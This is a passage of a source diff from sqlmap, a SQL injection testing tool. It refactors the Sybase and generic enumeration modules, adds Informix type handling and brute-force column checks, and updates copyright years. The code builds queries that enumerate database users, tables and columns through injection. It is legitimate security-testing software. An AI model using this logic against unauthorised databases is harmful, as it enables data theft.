(http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/sybase/__init__.py b/plugins/dbms/sybase/__init__.py index b2df16926..a315df108 100644 --- a/plugins/dbms/sybase/__init__.py +++ b/plugins/dbms/sybase/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/sybase/connector.py b/plugins/dbms/sybase/connector.py index 3b1c7be75..6439a468e 100644 --- a/plugins/dbms/sybase/connector.py +++ b/plugins/dbms/sybase/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -41,7 +41,7 @@ class Connector(GenericConnector): try: self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) - except pymssql.OperationalError, msg: + except (pymssql.Error, _mssql.MssqlDatabaseException), msg: raise SqlmapConnectionException(msg) self.initCursor() @@ -50,7 +50,7 @@ class Connector(GenericConnector): def fetchall(self): try: return self.cursor.fetchall() - except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg: + except (pymssql.Error, _mssql.MssqlDatabaseException), msg: logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) return None diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index 09a0356af..98c025932 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -1,26 +1,30 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -from lib.core.common import Backend from lib.core.common import filterPairValues from lib.core.common import isTechniqueAvailable from lib.core.common import randomStr +from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.data import paths from lib.core.data import queries from lib.core.dicts import SYBASE_TYPES +from lib.core.enums import DBMS from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapNoneDataException +from lib.core.exception import SqlmapUserQuitException from lib.core.settings import CURRENT_DB +from lib.utils.brute import columnExists from lib.utils.pivotdumptable import pivotDumpTable from plugins.generic.enumeration import Enumeration as GenericEnumeration @@ -32,7 +36,7 @@ class Enumeration(GenericEnumeration): infoMsg = "fetching database users" logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].users + rootQuery = queries[DBMS.SYBASE].users randStr = randomStr() query = rootQuery.inband.query @@ -89,7 +93,7 @@ class Enumeration(GenericEnumeration): infoMsg = "fetching database names" logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].dbs + rootQuery = queries[DBMS.SYBASE].dbs randStr = randomStr() query = rootQuery.inband.query @@ -120,7 +124,7 @@ class Enumeration(GenericEnumeration): conf.db = self.getCurrentDb() if conf.db: - dbs = conf.db.split(",") + dbs = conf.db.split(',') else: dbs = self.getDbs() @@ -138,7 +142,7 @@ class Enumeration(GenericEnumeration): else: blinds = [True] - rootQuery = queries[Backend.getIdentifiedDbms()].tables + rootQuery = queries[DBMS.SYBASE].tables for db in dbs: for blind in blinds: @@ -159,7 +163,7 @@ class Enumeration(GenericEnumeration): return kb.data.cachedTables - def getColumns(self, onlyColNames=False): + def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: @@ -180,7 +184,7 @@ class Enumeration(GenericEnumeration): conf.db = safeSQLIdentificatorNaming(conf.db) if conf.col: - colList = conf.col.split(",") + colList = conf.col.split(',') else: colList = [] @@ -191,7 +195,7 @@ class Enumeration(GenericEnumeration): colList[colList.index(col)] = safeSQLIdentificatorNaming(col) if conf.tbl: - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') else: self.getTables() @@ -208,7 +212,44 @@ class Enumeration(GenericEnumeration): for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl) - rootQuery = queries[Backend.getIdentifiedDbms()].columns + if bruteForce: + resumeAvailable = False + + for tbl in tblList: + for db, table, colName, colType in kb.brute.columns: + if db == conf.db and table == tbl: + resumeAvailable = True + break + + if resumeAvailable and not conf.freshQueries or colList: + columns = {} + + for column in colList: + columns[column] = None + + for tbl in tblList: + for db, table, colName, colType in kb.brute.columns: + if db == conf.db and table == tbl: + columns[colName] = colType + + if conf.db in kb.data.cachedColumns: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns + else: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns} + + return kb.data.cachedColumns + + message = "do you want to use common column existence check? [y/N/q] " + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() + + if choice == 'N': + return + elif choice == 'Q': + raise SqlmapUserQuitException + else: + return columnExists(paths.COMMON_COLUMNS) + + rootQuery = queries[DBMS.SYBASE].columns if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: blinds = [False, True] @@ -225,7 +266,7 @@ class Enumeration(GenericEnumeration): return {conf.db: kb.data.cachedColumns[conf.db]} - if colList: + if dumpMode and colList: table = {} table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table @@ -246,7 +287,7 @@ class Enumeration(GenericEnumeration): columns = {} for name, type_ in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.usertype" % randStr])): - columns[name] = SYBASE_TYPES.get(type_, type_) + columns[name] = SYBASE_TYPES.get(int(type_) if isinstance(type_, basestring) and type_.isdigit() else type_, type_) table[safeSQLIdentificatorNaming(tbl)] = columns kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table diff --git a/plugins/dbms/sybase/filesystem.py b/plugins/dbms/sybase/filesystem.py index c5dbc6943..1cd407e00 100644 --- a/plugins/dbms/sybase/filesystem.py +++ b/plugins/dbms/sybase/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py index 762ab95eb..919f64ce6 100644 --- a/plugins/dbms/sybase/fingerprint.py +++ b/plugins/dbms/sybase/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -58,9 +58,7 @@ class Fingerprint(GenericFingerprint): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(SYBASE_ALIASES) \ - or (conf.dbms or "").lower() in SYBASE_ALIASES) and Backend.getVersion() and \ - Backend.getVersion().isdigit(): + if not conf.extensiveFp and Backend.isDbmsWithin(SYBASE_ALIASES): setDbms("%s %s" % (DBMS.SYBASE, Backend.getVersion())) self.getBanner() diff --git a/plugins/dbms/sybase/syntax.py b/plugins/dbms/sybase/syntax.py index a0f1775d4..3e1d10ac2 100644 --- a/plugins/dbms/sybase/syntax.py +++ b/plugins/dbms/sybase/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/sybase/takeover.py b/plugins/dbms/sybase/takeover.py index 9a9dfd7c4..90c4d7270 100644 --- a/plugins/dbms/sybase/takeover.py +++ b/plugins/dbms/sybase/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/generic/__init__.py b/plugins/generic/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/plugins/generic/__init__.py +++ b/plugins/generic/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/generic/connector.py b/plugins/generic/connector.py index 7bce4748c..5ebbd0b82 100644 --- a/plugins/generic/connector.py +++ b/plugins/generic/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -11,6 +11,7 @@ from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapUndefinedMethod +from lib.core.settings import UNICODE_ENCODING class Connector: """ @@ -22,8 +23,8 @@ class Connector: self.cursor = None def initConnection(self): - self.user = conf.dbmsUser - self.password = conf.dbmsPass if conf.dbmsPass is not None else "" + self.user = conf.dbmsUser or "" + self.password = conf.dbmsPass or "" self.hostname = conf.hostname self.port = conf.port self.db = conf.dbmsDb diff --git a/plugins/generic/custom.py b/plugins/generic/custom.py index 2871d90c4..944b5c63c 100644 --- a/plugins/generic/custom.py +++ b/plugins/generic/custom.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -17,6 +17,7 @@ from lib.core.data import conf from lib.core.data import logger from lib.core.dicts import SQL_STATEMENTS from lib.core.enums import AUTOCOMPLETE_TYPE +from lib.core.exception import SqlmapNoneDataException from lib.core.settings import NULL from lib.core.settings import PARAMETER_SPLITTING_REGEX from lib.core.shell import autoCompletion @@ -35,38 +36,42 @@ class Custom: sqlType = None query = query.rstrip(';') - for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): - for sqlStatement in sqlStatements: - if query.lower().startswith(sqlStatement): - sqlType = sqlTitle - break + try: + for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): + for sqlStatement in sqlStatements: + if query.lower().startswith(sqlStatement): + sqlType = sqlTitle + break - if not any(_ in query.upper() for _ in ("OPENROWSET", "INTO")) and (not sqlType or "SELECT" in sqlType): - infoMsg = "fetching %s query output: '%s'" % (sqlType if sqlType is not None else "SQL", query) - logger.info(infoMsg) + if not any(_ in query.upper() for _ in ("OPENROWSET", "INTO")) and (not sqlType or "SELECT" in sqlType): + infoMsg = "fetching %s query output: '%s'" % (sqlType if sqlType is not None else "SQL", query) + logger.info(infoMsg) - output = inject.getValue(query, fromUser=True) + output = inject.getValue(query, fromUser=True) - return output - elif not isStackingAvailable() and not conf.direct: - warnMsg = "execution of custom SQL queries is only " - warnMsg += "available when stacked queries are supported" - logger.warn(warnMsg) + return output + elif not isStackingAvailable() and not conf.direct: + warnMsg = "execution of non-query SQL statements is only " + warnMsg += "available when stacked queries are supported" + logger.warn(warnMsg) - return None - else: - if sqlType: - debugMsg = "executing %s query: '%s'" % (sqlType if sqlType is not None else "SQL", query) + return None else: - debugMsg = "executing unknown SQL type query: '%s'" % query - logger.debug(debugMsg) + if sqlType: + debugMsg = "executing %s query: '%s'" % (sqlType if sqlType is not None else "SQL", query) + else: + debugMsg = "executing unknown SQL type query: '%s'" % query + logger.debug(debugMsg) - inject.goStacked(query) + inject.goStacked(query) - debugMsg = "done" - logger.debug(debugMsg) + debugMsg = "done" + logger.debug(debugMsg) - output = NULL + output = NULL + + except SqlmapNoneDataException, ex: + logger.warn(ex) return output @@ -114,15 +119,18 @@ class Custom: infoMsg = "executing SQL statements from given file(s)" logger.info(infoMsg) - for sfile in re.split(PARAMETER_SPLITTING_REGEX, conf.sqlFile): - sfile = sfile.strip() + for filename in re.split(PARAMETER_SPLITTING_REGEX, conf.sqlFile): + filename = filename.strip() - if not sfile: + if not filename: continue - query = getSQLSnippet(Backend.getDbms(), sfile) + snippet = getSQLSnippet(Backend.getDbms(), filename) - infoMsg = "executing SQL statement%s from file '%s'" % ("s" if ";" in query else "", sfile) - logger.info(infoMsg) - - conf.dumper.query(query, self.sqlQuery(query)) + if snippet and all(query.strip().upper().startswith("SELECT") for query in filter(None, snippet.split(';' if ';' in snippet else '\n'))): + for query in filter(None, snippet.split(';' if ';' in snippet else '\n')): + query = query.strip() + if query: + conf.dumper.query(query, self.sqlQuery(query)) + else: + conf.dumper.query(snippet, self.sqlQuery(snippet)) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 195b2d6a7..ddea7215b 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -1,13 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.agent import agent from lib.core.common import arrayizeValue from lib.core.common import Backend +from lib.core.common import extractRegexResult from lib.core.common import filterPairValues from lib.core.common import flattenValue from lib.core.common import getLimitRange @@ -19,6 +20,7 @@ from lib.core.common import isTechniqueAvailable from lib.core.common import parseSqliteTableSchema from lib.core.common import popValue from lib.core.common import pushValue +from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import singleTimeWarnMessage @@ -30,6 +32,7 @@ from lib.core.data import logger from lib.core.data import paths from lib.core.data import queries from lib.core.dicts import FIREBIRD_TYPES +from lib.core.dicts import INFORMIX_TYPES from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED @@ -39,8 +42,9 @@ from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import CURRENT_DB from lib.request import inject -from lib.techniques.brute.use import columnExists -from lib.techniques.brute.use import tableExists +from lib.techniques.union.use import unionUse +from lib.utils.brute import columnExists +from lib.utils.brute import tableExists class Databases: """ @@ -211,7 +215,7 @@ class Databases: conf.db = conf.db.upper() if conf.db: - dbs = conf.db.split(",") + dbs = conf.db.split(',') else: dbs = self.getDbs() @@ -238,12 +242,12 @@ class Databases: return kb.data.cachedTables - message = "do you want to use common table existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") + message = "do you want to use common table existence check? %s " % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: return tableExists(paths.COMMON_TABLES) @@ -265,9 +269,9 @@ class Databases: if conf.excludeSysDbs: infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) logger.info(infoMsg) - query += " IN (%s)" % ",".join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList) + query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList) else: - query += " IN (%s)" % ",".join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs)) + query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs)) if len(dbs) < 2 and ("%s," % condition) in query: query = query.replace("%s," % condition, "", 1) @@ -332,7 +336,7 @@ class Databases: query = rootQuery.blind.query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ") elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): query = rootQuery.blind.query % index - elif Backend.isDbms(DBMS.HSQLDB): + elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.INFORMIX): query = rootQuery.blind.query % (index, unsafeSQLIdentificatorNaming(db)) else: query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index) @@ -358,7 +362,7 @@ class Databases: if bruteForce is None: logger.error(errMsg) return self.getTables(bruteForce=True) - else: + elif not conf.search: raise SqlmapNoneDataException(errMsg) else: for db, tables in kb.data.cachedTables.items(): @@ -370,7 +374,7 @@ class Databases: return kb.data.cachedTables - def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): + def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: @@ -415,10 +419,10 @@ class Databases: colList = filter(None, colList) if conf.tbl: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.tbl = conf.tbl.upper() - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') else: self.getTables() @@ -432,10 +436,12 @@ class Databases: tblList = tblList[0] tblList = list(tblList) - else: + elif not conf.search: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) raise SqlmapNoneDataException(errMsg) + else: + return kb.data.cachedColumns tblList = filter(None, (safeSQLIdentificatorNaming(_, True) for _ in tblList)) @@ -448,7 +454,7 @@ class Databases: elif Backend.isDbms(DBMS.ACCESS): errMsg = "cannot retrieve column names, " - errMsg += "back-end DBMS is Access" + errMsg += "back-end DBMS is %s" % DBMS.ACCESS logger.error(errMsg) bruteForce = True @@ -480,11 +486,11 @@ class Databases: return kb.data.cachedColumns message = "do you want to use common column existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: return columnExists(paths.COMMON_COLUMNS) @@ -509,7 +515,7 @@ class Databases: if len(colList) > 0: if colTuple: _, colCondParam = colTuple - infoMsg += "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) + infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) else: colCondParam = "='%s'" infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) @@ -517,10 +523,6 @@ class Databases: condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery @@ -534,7 +536,29 @@ class Databases: elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): query = rootQuery.inband.query % tbl - values = inject.getValue(query, blind=False, time=False) + if dumpMode and colList: + values = [(_,) for _ in colList] + else: + infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.info(infoMsg) + + values = None + if Backend.isDbms(DBMS.MSSQL) and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): + expression = query + kb.dumpColumns = [] + kb.rowXmlMode = True + + for column in extractRegexResult(r"SELECT (?P<result>.+?) FROM", query).split(','): + kb.dumpColumns.append(randomStr().lower()) + expression = expression.replace(column, "%s AS %s" % (column, kb.dumpColumns[-1]), 1) + + values = unionUse(expression) + kb.rowXmlMode = False + kb.dumpColumns = None + + if values is None: + values = inject.getValue(query, blind=False, time=False) if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): index, values = 1, [] @@ -567,7 +591,11 @@ class Databases: query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(name.upper())) else: query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(name)) + comment = unArrayizeValue(inject.getValue(query, blind=False, time=False)) + if not isNoneValue(comment): + infoMsg = "retrieved comment '%s' for column '%s'" % (comment, name) + logger.info(infoMsg) else: warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() warnMsg += "possible to get column comments" @@ -576,8 +604,17 @@ class Databases: if len(columnData) == 1: columns[name] = None else: + key = int(columnData[1]) if isinstance(columnData[1], basestring) and columnData[1].isdigit() else columnData[1] if Backend.isDbms(DBMS.FIREBIRD): - columnData[1] = FIREBIRD_TYPES.get(columnData[1], columnData[1]) + columnData[1] = FIREBIRD_TYPES.get(key, columnData[1]) + elif Backend.isDbms(DBMS.INFORMIX): + notNull = False + if isinstance(key, int) and key > 255: + key -= 256 + notNull = True + columnData[1] = INFORMIX_TYPES.get(key, columnData[1]) + if notNull: + columnData[1] = "%s NOT NULL" % columnData[1] columns[name] = columnData[1] @@ -604,7 +641,7 @@ class Databases: if len(colList) > 0: if colTuple: _, colCondParam = colTuple - infoMsg += "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) + infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) else: colCondParam = "='%s'" infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) @@ -612,10 +649,6 @@ class Databases: condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery @@ -633,38 +666,51 @@ class Databases: query = rootQuery.blind.count % (tbl) query += condQuery + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.count % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl) + query += condQuery + elif Backend.isDbms(DBMS.SQLITE): query = rootQuery.blind.query % tbl value = unArrayizeValue(inject.getValue(query, union=False, error=False)) parseSqliteTableSchema(value) return kb.data.cachedColumns - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - table = {} columns = {} - if not isNumPosStrValue(count): - if Backend.isDbms(DBMS.MSSQL): - count, index, values = 0, 1, [] - while True: - query = rootQuery.blind.query3 % (conf.db, tbl, index) - value = unArrayizeValue(inject.getValue(query, union=False, error=False)) - if isNoneValue(value) or value == " ": - break - else: - columns[safeSQLIdentificatorNaming(value)] = None - index += 1 + if dumpMode and colList: + count = 0 + for value in colList: + columns[safeSQLIdentificatorNaming(value)] = None + else: + infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.info(infoMsg) - if not columns: - errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "") - errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.error(errMsg) - continue + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if not isNumPosStrValue(count): + if Backend.isDbms(DBMS.MSSQL): + count, index, values = 0, 1, [] + while True: + query = rootQuery.blind.query3 % (conf.db, tbl, index) + value = unArrayizeValue(inject.getValue(query, union=False, error=False)) + if isNoneValue(value) or value == " ": + break + else: + columns[safeSQLIdentificatorNaming(value)] = None + index += 1 + + if not columns: + errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "") + errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.error(errMsg) + continue for index in getLimitRange(count): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery field = None @@ -680,6 +726,10 @@ class Databases: query = rootQuery.blind.query % (tbl) query += condQuery field = None + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.query % (index, conf.db, conf.db, conf.db, conf.db, conf.db, tbl) + query += condQuery + field = condition query = agent.limitQuery(index, query, field, field) column = unArrayizeValue(inject.getValue(query, union=False, error=False)) @@ -692,7 +742,11 @@ class Databases: query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(column.upper())) else: query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(column)) + comment = unArrayizeValue(inject.getValue(query, union=False, error=False)) + if not isNoneValue(comment): + infoMsg = "retrieved comment '%s' for column '%s'" % (comment, column) + logger.info(infoMsg) else: warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() warnMsg += "possible to get column comments" @@ -708,11 +762,22 @@ class Databases: conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query2 % (tbl, column) + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl, column) colType = unArrayizeValue(inject.getValue(query, union=False, error=False)) + key = int(colType) if isinstance(colType, basestring) and colType.isdigit() else colType if Backend.isDbms(DBMS.FIREBIRD): - colType = FIREBIRD_TYPES.get(colType, colType) + colType = FIREBIRD_TYPES.get(key, colType) + elif Backend.isDbms(DBMS.INFORMIX): + notNull = False + if isinstance(key, int) and key > 255: + key -= 256 + notNull = True + colType = INFORMIX_TYPES.get(key, colType) + if notNull: + colType = "%s NOT NULL" % colType column = safeSQLIdentificatorNaming(column) columns[column] = colType @@ -805,7 +870,7 @@ class Databases: elif "." in conf.tbl: if not conf.db: - conf.db, conf.tbl = conf.tbl.split(".") + conf.db, conf.tbl = conf.tbl.split('.', 1) if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): warnMsg = "missing database parameter. sqlmap is going to " @@ -818,7 +883,7 @@ class Databases: self.forceDbmsEnum() if conf.tbl: - for table in conf.tbl.split(","): + for table in conf.tbl.split(','): self._tableGetCount(conf.db, table) else: self.getTables() diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 125aa8226..5e1ad3321 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -12,6 +12,7 @@ from lib.core.bigarray import BigArray from lib.core.common import Backend from lib.core.common import clearConsoleLine from lib.core.common import getLimitRange +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import isInferenceAvailable from lib.core.common import isListLike @@ -42,7 +43,6 @@ from lib.core.settings import NULL from lib.request import inject from lib.utils.hash import attackDumpedTable from lib.utils.pivotdumptable import pivotDumpTable -from lib.utils.pivotdumptable import whereQuery class Entries: """ @@ -79,7 +79,7 @@ class Entries: if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.tbl = conf.tbl.upper() - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') else: self.getTables() @@ -88,10 +88,12 @@ class Entries: if isinstance(tblList[0], (set, tuple, list)): tblList = tblList[0] - else: + elif not conf.search: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) raise SqlmapNoneDataException(errMsg) + else: + return for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) @@ -102,12 